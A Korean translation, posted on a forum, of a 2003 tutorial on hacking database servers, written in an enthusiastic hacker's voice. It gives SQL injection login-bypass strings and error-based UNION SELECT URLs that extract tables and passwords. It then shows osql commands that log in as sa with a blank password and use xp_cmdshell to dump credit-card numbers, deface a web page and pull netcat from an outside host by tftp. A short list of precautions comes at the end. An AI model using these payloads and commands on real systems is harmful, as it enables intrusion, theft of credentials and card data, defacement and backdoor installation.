Hacking Database Servers

   Á¶È¸ 236837   Ãßõ 1    

¼¼¹ú½­_Hacking_Database_Servers.doc (68.5K), Down : 6, 2017-07
¼¼¹ú½­_Hacking_Database_Servers.pdf (60.9K), Down : 15, 2017-07

Hacking Database Servers !

+---------------------------------------------------------------+

원문서 제목 : Hacking Database Servers !
원문서 저자 : chesschintan
 ************@*******.com

원문서 작성일 : 2003. 05. 06
문 서 번역일 : 
2003. 06. 03

문 서 번역자 : 광주광역쉬에서 세벌쉭

코 멘 트 : 본 번역본은 순전히 개인적인 호기심에서 번역한 것이다. 

 조금이라도 의심스러운 해석은 원문서를 참조하기 바란다.

 오자, 탈자, 오역이 존재하는 초벌 번역임을 참고하시기 바란다.

 문서에서 "scr1pt" 가 포함된 단어는 "scr i pt"(붙여 쓰기) 로 변경하라 단지 한번만 변경하면 될 것이다.
+---------------------------------------------------------------+

데이타베이스들은 상업적 웹사이트의 핵심이다. 데이타베이스 서버들을 공격하는것은 회사에 엄청난 금전적 손실을 일의킬 수 있다. 데이타베이스 서버들은 크레디트 카드에 관한 정보를 얻기위해서 해킹되어진다. 한번 해킹당한 상업적 사이트는그들의 평판과 고객들을 감소시키게 된다. 그래서 그들은 그들의 크레디트 카드 정보를 안전하게 보관하기를 원한다. 대부분의 상업적 웹 사이트들은 마이크로소프트 SQL(MSsql) 과 오라클 데이터베이스 서버들을 사용한다. MS sql 은 시장을 지배하고 있다. 왜냐하면 그 가격이 무척이나 싸기 때문이다. 오라클 서버들이 고가 정책을 쓰고 있는 동안에 말이다.

얼마전에 오라클은 그들의 서버가 "unbreakbable" 이라고 주장하고 있지만 해커들은 오라클의 주장에 도전하여 오라클 서버에도 역시 수많은 버그들이 있음을 입증하였다. 나는 몇달 전부터 데이타베이스 서버들을 해킹하는 재미에 흠뻑 취해 있다. 그래서 나는 나의 이러한 열정을 다른이들과 함께 공유 하도록 결정했다. 물론 여기에서 다루어지는 것들은 나에의해서 발견되어 진 것들은 아니다. 나는 그것들을 많은 시간들 동안 실습 보았다.

이 문서는 두 부분으로 나누어진다 :
1. Using the HTTP port 80
2. Using the MS SQL port 1434



Part I – Using HTTP port 80 ( Or better would be malformed URLs)
=============================================================================


이 부분은 해커들 뿐만아니라 웹 디자이너들에게도 유용한 부분이 될 것이다. 웹 디자이너들에 의해서 만들어지는 일반적인 실수는 해커에게 서버의 데이타베이스를 노출 시킬 수 있다. 그럼 진행을 계속해 나가 보자. 이 문서의 전반적인 내용은 쿼리 문자열에 관한 것이다. 그래서 말인데 나는 독자들이 쿼리 와 asp 에 관해서 약간의 지식이 있다는 것을 가정한다. 그리고 한가지 더. 여기에 나온 것들은 오직 브라우져만을 사용해서 행해 졌다. 그러므로 당신은 IE 나 Netscape 이외의 어떠한 툴들도 필요 하지 않다. 일반적으로 로긴 페이지를 만들기 위해서 웹 디자이너들은 다음과 같은 코드를 사용 할 것 이다.

login.htm

<html>
<body>
<form method=get action="logincheck.asp">
<input type="text" name="login_name">
<input type="text" name="pass">
<input type="submit" value="sign in">
</form>
</body>
</html>

logincheck.asp

<@language="vbscript">
<%
dim conn,rs,log,pwd
log=Request.form("login_name")
pwd=Request.form("pass")

set conn = Server.CreateObject("ADODB.Connection")
conn.ConnectionString="provider=microsoft.jet.OLEDB.4.0;data source=c:\folder\multiplex.mdb"
conn.Open
set rs = Server.CreateObject("ADODB.Recordset")
rs.open "Select * from table1 where login='"&log& "' and password='" &pwd& "' ",conn
If rs.EOF
response.write("Login failed")
else
response.write("Login successful")
End if
%>

첫번째 사이트에 있는 위의 코드를 살펴보자면 별다른 문제가 없어보인다. 사용자는 그의 로긴 네임과 패스워드를 입력 할 것이다. login.htm 페이지에서 말이다. 그리고 submit 버튼을 클릭 할 것이다. 텍스트 박스들의 값은 logincheck.asp 페이지에 전달 될 것이고 그것들은 쿼리 문자열을 사용하여 점검 되어 질 것이다. 만일 그것들이 쿼리를 만족시키지 못하는 일이 발생하게 된다면 화일의 끝에 도달하게 되고 로긴 실폐 메시지가 출력되어질 것이다. 아직 까지는 모든 것이 정상적으로 잘 작동하고 있다. 잠깐만 !! 다시한번 유심히 살펴보자. 정말 별 문제가 없는 것일까 ? 쿼리에 관해서 말이다!! 어떤 문제가 있는지 의심이 가지 않는가 ? 다른 사람도 아닌 바로 당신이 이와 같은 페이지를 만들었다면 해커는 패스워드를 모르면서도 그리고 아주 쉽게 로긴에 성골 할 수 있다. 어랍쇼 !! 어떻게 ? 쿼리 부분을 다시 한번 유심히 살펴 보자.

"Select * from table1 where login='"&log& "' and password='" &pwd& "' "

이제 만일 사용자가 로긴 네임으로 "Chintan", 패스워드로 "h4x3r" 을 입력하고 그 값들이 POST 메서드로서 asp 페이지로 전달되어 지면 위에 쿼리는 다음과 같이 된다.

"Select * from table1 where login=' Chintan ' and password=' h4x3r ' "

일반적인 진행인 것이다. 데이타베이스 안에서 login 과 password 필드들은 Chintan 과 h4x3r 값을 나타내게 되고 우리는 로긴에 성공했다는 메시지를 받게 될 것이다. 이제 만일 내가 로긴 네임에 Chintan 이라고 입력하고 패스워드 텍스트 박스의 패스워드에는 hi' or 'a'=a 라고 입력을 한다면 무슨일이 있어 날까 ? 쿼리는 다음과 같이 될 것이다 :

"Select * from table1 where login=' Chintan ' and password=' hi' or 'a'='a ' "

그리고 submit 버튼을 누르게 된다면 ? 접속 성공 !!! 놀랍지 않는가 ? 나는 로긴 성공이라는 메시지를 받게 될 것이다. 웹디자이너의 부주의 함을 바로 지적해 내는 해커의 짓굿은 장난 아니 경고를 보고 계시는 것이다. 쿼리는 쿼리 변경 과 패스워드가'hi' or 'a' 는 'a' 과 같다는 것으로서 충족되어 졌다.(??The query gets satisfied as query changes and password needs to 'hi' or 'a' needs to be equal to 'a'.??) 분명히 패스워드는 'hi' 도 'a'='a' 도 아니다. 하지만 조건은 만족 되었고 해커는 "Chintan" 접속에 성공했다. 만일 위에 문자열이 몇몇 웹사이트에서 작동이 안된다면 패스워드 텍스트 박스에 다음 문자열로 시도해 보라 :

hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

위에 것들에서 "--" 는 쿼리 스트링의 나머지를 설명문(코멘트)이 되게하므로 다른 조건들이 검사되어지지 않을 것이다. 유사하게 당신은 로긴 네임 텍스트 박스 안에 다음 문자열 이나 다른 가능한 형태의 입력을 제공하고 당신이 원하는 아무것이나 패스워드로 제공 할 수 있다( Similary you can provide ~~ or such types of other possibilites in the login name textbox and password as anything which might let you in.)

Chintan ' --
Chintan " --

쿼리 스트링 안에서 단지 로긴 네임 "Chintan" 만이 검사되어지고 "--" 때문에 나머지는 무시되어 질 것이기 때문이다. 만일 당신이 행운아 여서 위와 같은 실수가 저질러진 웹 사이트를 발견 할 수가 있다면 당신은 어떠한 유저로도 접속 할 수 있을 것이다.

IMP NOTE: 지금까지 본 문서를 탐익 하시느라 고생 하셨다. 여기 여러분들을 위한 약간의 선물을 준비 했다. SQL Injection 취약점이 있는 웹 페이지 이다. 스스로 실험해 보시길 바란다.
www33.brinkster.com/chintantrivedi/login.htm

More advance hacking of Databases using ODBC error messages!!!
----------------------------------------------------------------
위에서 공부한 것 들은 패스워드를 모른 상태에서 어떻게 성공적으로 로긴을 하는가 이다. 이제 그것들을 넘어서서 URL 안에 쿼리를 사용해서 전체 데이터베이스를 어떻게 하면 읽어 낼 수 있는가에 대해서 알아 보도록 하자. 이것은 IIS 즉 asp 페이지들에서만 작동한다. 우리는 IIS 가 웹시장의 약 35% 를 장악 하고 있다는 것을 알고 있다. 그래서 당신은 몇몇 웹사이트들을 조사 한 후에 확실히 희생양을 찿을 수 있을 것이다. 당신이 URL 안에서 다음과 같은 것을 보게 된다면...

http://www.nosecurity.com/mypage.asp?id=45

저기 '?' 다음에 있는 것이 그것을 보여 주고 45값은 히든 데이터 타입 id 에 전달 되어진다. 만일 당신이 이해를 하지 못했다면, 위의 예제에서 먼저 두 입력 텍스트을 가지고 있는 login.htm 에서 login_name, pass 에 입력을 하고 그들 값들은 logincheck.asp 페이지에 전달되어진다. 만일 URL 안에 method="post" 대신에 method="get"이 사용 되어 진다면 똑같은 일은 다음 문장을 사용해 logincheck.asp 페이지를 직접 오픈함으로서 수행 할 수 있다.

Note : get 과 post 메서드의 차이점은 post 메서드는 다음 페이지에 전달 되어지는 값을 보여주지 않는 것이고 get 메서드는 값을 보여준다. 그것들이 내부적으로 어떻게 작동하는지 더 알고 싶다면 HTTP 프로토콜 RFC 1945 와 RFC 2616 을 읽어보라.

내가 말 하고자 하는 것은 '?' 다음에 있는 것들이 그 페이지에서 사용하고자 하는 변수들에 값을 할당 한다는 것이다. 위에서 login_name 에는 Chintan 이라는 값이 주어진다. 또 다른 변수들은 연산자 '&' 로 구별 되어 진다.

다시 돌아 와서 id 는 대부분 히든 타입일 것이고 당신이 클릭한 링크를 따라서 그 값은 변할 것이다. id 의 이 값은 mypage.asp 페이지 안에 쿼리로 전달 되어지고 결과에 따로서 당신은 당신의 화면에 원하는 페이지를 보게 된다. 이제 만일 id 값을 46으로 변경 하면 당신은 다른 페이지를 볼 수 있을 것이다. 이제 데이터베이스 해킹을 시작해 보자. 쿼리의 마술을 실험해 보자. URL에 다음과 같이 입력해 보라 :

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

INFORMATION_SCHEMA.TABLES 은 시스템 테이블이고 그것은 서버의 모든 테이블에 관한 정보를 포함하고 있다. 그곳에는 모든 테이블들의 이름을 포함하고 있는 TABLE_NAME 필드가 있다. 쿼리를 다시 한반 보자 :

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES

이 쿼리의 결과는 INFORMATION_SCHEMA.TABLES 테이블로 부터 첫번째 테이블 이름이다. 하지만 우리가 얻은 결과는 문자열(nvarchar) 테이블 이고 우리는 정수 45와 UNION 연산에 의해서 통합을 시도한다. 그래서 으리는 다음과 같은 에러 메시지를 얻게 될 것이다.

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'logintable' to a column of data type int. /mypage.asp, line

에러 메시지에서 첫번째 테이블이 'logintalbe' 이라는 것을 알 수 있다. 이 테이블은 로긴 네임과 패스워드를 포함하고 있을 것이다. 그 안으로 이동해 보자. URL 안에 다음과 같이 입력하라 :

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--

output
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_id' to a column of data type int.
/index.asp, line 5

위의 에러 메시지는 logintable 안에 있는 첫번째 필드나 컬럼이 login_id 이라는 것을 보여 주고 있다. 다음 컬럼 이름을 얻기 위해서 다음과 같이 입력 하라 :

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_name' to a column of data type int.
/index.asp, line 5

그래서 우리는 'login_name' 같은 다른 필드 이름을 얻었다. 세번째 필드 이름을 얻기 위해서 다음을 입력 하라 :

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'passwd' to a column of data type int.
/index.asp, line 5

잘 했다. 우리는 마침내 'passwd' 필드 이름을 얻었다. 이제 "logintable" 테이블에서 로긴 네임과 패스워드을 획득할 차례이다. 다음과 같이 입력하라 :

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 login_name FROM logintable--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'Rahul' to a column of data type int.
/index.asp, line 5

로긴 네임이 "Rahul" 이라는 것을 알 았으므로 "Rahul" 의 패스워드를 얻기 위해서 다음의 쿼리를 보내보자

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 password FROM logintable
where login_name='Rahul'--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'P455w0rd' to a column of data type int.
/index.asp, line 5

어쭈구리 !! login name: Rahul and password: P455w0rd. 당신은 www.nosecurity.com 의 데이터 베이스 크랙에 성공 했다. 사용자의 요구가 적당하게 체크되어지지 않을때 가능하다. SQL 취약점들은 많은 웹사이트들에서 아직도 존재하고 있다. 최상의 해결책은 사용자의 요구를 파싱하고 ', ", --, : 등의 몇몇 문자들을 필터링 하는 것이다.

Part II - using port 1434 (SQL Port)
=============================================================================

지금 까지 우리는 malformed URLs 을 사용하는 데이터 베이스를 조작하는 방법을 보았다. 하지만 그것은 포트 80(http 포트) 번말은 사용해서 실행되어 졌다. 이번에는 해킹을 위해서 1434 포트를 사용해 보자. 앞에서 우리는 실제 데이타베이스 서버들이 무엇인지를 보았고 어떻게 작동하는지 그리고 그것을 어떻게 익스플로잇 하는지에 대허서도 알오 보았다.

MS sql 의 디자이너들은 웹디자이너들에게 융통성을 주기 위해서 제품에 몇개의 "초기치 저장된 프로시저들"을 주었다. 프로시저는 그들에 전달되어지는 아규먼트을 가지고 몇가지 행위를 실행하기 위해서 사용하는 함수일 뿐이다. 이 프로시저들은 해커들에게 매우 중요하다. 중요한 것들 중에서 몇가지는 :

sp_passsword -> 특정 로긴 네임을 위해 패스워드를 변경한다.

예 : EXEC sp_password ‘oldpass’, ‘newpass’, ‘username’

sp_tables -> 현제 데이터 베이스 안에있는 모든 테이블을 보여준다.

예 : EXEC sp_tables

xp_cmdshell -> 관리자 특권으로 머쉰 상에서 임의의 명령을 실행한다. (가장 중요)

xp_msver -> OS 에 관한 모든 정보를 포함해서 MS SQL 서버 버전을 보여 준다.

예 : master..xp_msver

xp_regdeletekey -> 레지스트리 키를 삭제한다.

xp_regdeletevalue -> 레지스트리 값을 삭제한다.

xp_regread -> 레지스트리 값을 읽는다.

xp_regwrite -> 레지스트리 키를 기록 한다.

xp_terminate_process -> 프로세스를 정지 시킨다.

이런한 것들은 약간 중요한 프로시져들이다. 실제로 50개 이상의 프로시저들이 있다. 만일 당신이 당신의 MS SQL 서버가 보호되어지기를 원한다면 이러한 프로시저들을 삭제 하기를 추천한다. 트릭은 MS SQL Server Enterprise Manager 를 사용해서 마스터 데이터베이스를 오픈 한는 것이다. 이제 Extended Stored Procedures 폴더에 들어가서 오른쪽 클릭으로 저장된 프로시져를 선택하고 지워라.

Note: “Master” 는 로긴 이름과 시스템 저장된 프로시저들 같은 모든 시스템 정보를 포함하고 있는 SQL 서버의 중요한 데이터 베이스 이다. 그래서 만일 해커가 이 데이터 베이스를 삭제 하게 된다면 SQL 서버는 영원히 다운 될 것이다. Syslogins 은 데이터 베이스 안에 로긴자들의 사용자 이름들과 패스워드들을 포함하고 있는 디폴트 시스템 페이블이다.

Most dangerous threat : 마이크로소프트 SQL 서버는 디폴트로 사용자 이름 "sa", 패스워드 ""(공란) 을 가지고 있다. 과거에 이것은 많은 MS sql 서버들을 파괴했다. 심지어는 이 취약점을 이용한 바이러스들이 배포 되어지기도 했다.

충분한 것들을 알아 보았으므로 이제 해킹을 시도해 보자. 첫번째로 우리는 취약서버를 찿아볼 필요가 있다. 좋은 포트 스캐너(웹상에는 수없이 많다)를 다운로드 하고 1433/1434(tcp 나 디ㅍ) 포트를 오픈하고 있는 IP 주소를 스캔 하자. 이것은 sql 서비스가 실행되고 있는 MS sql 포트이다. 오라클의 포트 넘버는 1521 이다. 우리는 IP 198.188.178.1 (단지 예일 뿐이다. 그래서 이곳에 시도하지 말기를)를 가지고 있는 서버에서 취약 서버를 발견했다고 하자. 포트 1433/1434 번을 사용해서 telnet 이나 netcat 로 접속 하는 등의 SQL 서비스를 사용하기위한 많은 방법들이 있다. 당신은 SQL 서버 2000 을 여행하기 위해 osql.exe 같은 잘 알려진 툴을 사용 할 수도 있다. 이제 도스 프롬프트 상에서 다음과 같이 입력하자 :

C:>osql.exe -?
osql: unknown option ?
usage: osql [-U login id] [-P password]
[-S server] [-H hostname] [-E trusted connection]
[-d use database name] [-l login timeout] [-t query timeout]
[-h headers] [-s colseparator] [-w columnwidth]
[-a packetsize] [-e echo input] [-I Enable Quoted Identifiers]
[-L list servers] [-c cmdend]
[-q "cmdline query"] [-Q "cmdline query" and exit]
[-n remove numbering] [-m errorlevel]
[-r msgs to stderr] [-V severitylevel]
[-i inputfile] [-o outputfile]
[-p print statistics] [-b On error batch abort]
[-O use Old ISQL behavior disables the following]
<EOF> batch processing
Auto console width scaling
Wide messages
default errorlevel is -1 vs 1
[-? show syntax summary]

osql 툴의 헬프 메시지가 출력 되었다. 이 메시지로 부터 우리가 해야할일이 무엇인지를 명확히 알수 있다. 다음을 입력하라 :

C:\> osql.exe –S 198.188.178.1 –U sa –P “”
1>
사용자 "sa" 로 로긴에 성공 했다거나 실폐 했다는 에러 메시지를 받게 될 것이다.

이제 리모트 머신 상에서 어떤 명령을 실행하기를 원한다면 "xp_cmdshell" 디폴트 저장된 프로시저를 사용하라.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘dir >dir.txt’”

-q 옵션 대신에 -Q 옵션을 사용하는 것을 좋아한다. 왜냐하면 그것은 쿼리를 실행 한다음에 종료 하기 때문이다. 똑같은 방법으로 리모트 머신 상에서 어떤 명령이든 실행 할 수가 있다. 심지어는 리모트 머신으로 부터/상으로 어떤 화일도 업로드 다운로드가 가능하다. 현명한 공격자들은 나중에 접속하기 위해서 머신상에 백도어를 인스톨 할 것이다. 앞에서 테이블들의 리스트와 그것의 내용들을 얻기 위해서 "information_schema.tables"를 사용 할 수 있다는것을 설명 했었다.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from information_schema.tables”

login, accounts, users, 크레디트 카드 번호 같은 중요한 정보를 포함하고 있을것 같은 것, 같은 몇몇 테이블을 조사해서 테이블을 이름들을 얻는다.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from users”

그리고

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select username, creditcard, expdate from users”

Output:

Username creditcard expdate
----------- ------------ ----------
Jack 5935023473209871 2004-10-03 00:00:00.000
Jill 5839203921948323 2004-07-02 00:00:00.000
Micheal 5732009850338493 2004-08-07 00:00:00.000
Ronak 5738203981300410 2004-03-02 00:00:00.000

index.html 화일 안에 먼가를 기록해 보자.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘echo defaced by Chintan > C:\inetpub\wwwroot\index.html’”

리모트 시스템 상에 어떤 화일을 업로드 하기를 원한다면

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘tftp 203.192.16.12 GET nc.exe c:\nc.exe’”

어떤 화일은 다운 로드 하기 위해서 GET 대신에 PUT 요구를 사용 할수 있다. 이 명령은 우리의 머신이 아닌 리모트 머신 상에서 실행되어지기 때문이다. 그래서 만일 당신이 GET 요그를 준다면 명령은 리모트 머신 상에서 실행 되어질것이고 우리 머신으로 부터 리모트 머신으로 nc.exe 화일을 업로드를 시도 하게 될 것이다.

아직 끝나지 않았다. Sql 서버들의 로긴 패스워들을 해킹하기 위한 툴들은 웹상에 쉽게 구할 수 있다. 심지어는 사용자들로 하여금 관리자 권한으로 시스템을 완벽하게 컨트롤 하는 것이 가능하는 많은 버퍼 오버플로우들이 발경되어진다. 이 문서는 데이터 베이스 서버들에 관한 몇몇의 일반적인 이슈들을 말하고 있다.

1월 25일 배포된 Sapphire 웜(대한민국의 인터넷 대란을 일으킨 웜을 지칭 하는 듯)을 기억 하라. SQL 서버들상에서 3개의 잘 알려진 취약점을 익스플로잇한 이 웜은 UDP 1433/1434 포트를 사용한다.


Precautionay measures 
----------------------------------------------------------------

<*> sa 의 디폴트 패스워드를 변경하라.
<*> 모든 디폴트 저장된 프로시져들을 삭제하라.
<*> ', ", --, : 등 문자들을 필터링 하라,
<*> 신속하게 패치를 유지하라.
<*> 파이어월들을 사용하는 1433/1434 포트(MS SQL), 1521(orachel) 포트를 막아 놓아라.

보안은 미리 만들어 져 있는 것이 아니라는 것을 기억하라. 그것은 관리자의 관심과 능력에 좌우된다. 해커와 관리자 사이의 전쟁은 계속되어 질것이고 계속 계속 그리고 계속되어 질것이다. 최근 뉴스와 버그 리포트를 잘 알고 있는 사람만이 이 전쟁에서 이길 수 있을 것이다. 디에터 베이스 관리자는 다음과 같은 사이트를 지속적으로 관찰하여야 할 것이다.

http://sqlsecurity.com
http://www.cert.com

어떠한 언급이나 좋은 비판은 항상 받아 질 것이다( ************@*******.com ). 당신은 http://chintan.8m.net 에서 나를 만날 수 있을 것이다.

Chintan Trivedi
http://chintan.8m.net
************@*******.com


반갑습니다.
¼¼¹ú½­ 2017-07
ÀÚ·á Â÷¿ø¿¡¼­ ¿Ã·Á º¾´Ï´Ù.
NeOpLe 2017-10
ÁÁÀº ÀÚ·áÀÔ´Ï´Ù.


Á¦¸ñPage 16/28
2016-02   16649   ĵÀ§µå
2017-04   13331   ½ºÅ³¼­Æ÷Æ®
2019-04   11246   ¸ð½º¿ùµå
2016-03   15705   °¡¸¸ÀÌÀ־
2015-02   38529   ȲÁø¿ì
2013-11   21035   ¿¥ºê¸®¿À
2022-03   11611   µö·¯´×¼­¹ö
2016-08   19260   ±èȲÁß
2013-11   12704   ȲÁø¿ì
2018-06   22421   TLaJ3KtYGr
2016-03   19593   俵Áø
2021-11   16526   µö·¯´×¼­¹ö
2020-02   9082   ȲÁø¿ì
2023-03   20047   ¿ö´Ï´Ô
2016-03   11030   ĵÀ§µå
2020-11   13584   È­Á¤Å¥»ï
2019-05   11298   chobo
2019-07   24939   µö·¯´×¼­¹ö
2023-03   44784   witbox
2013-01   70391   ÀÌÁöÆ÷Åä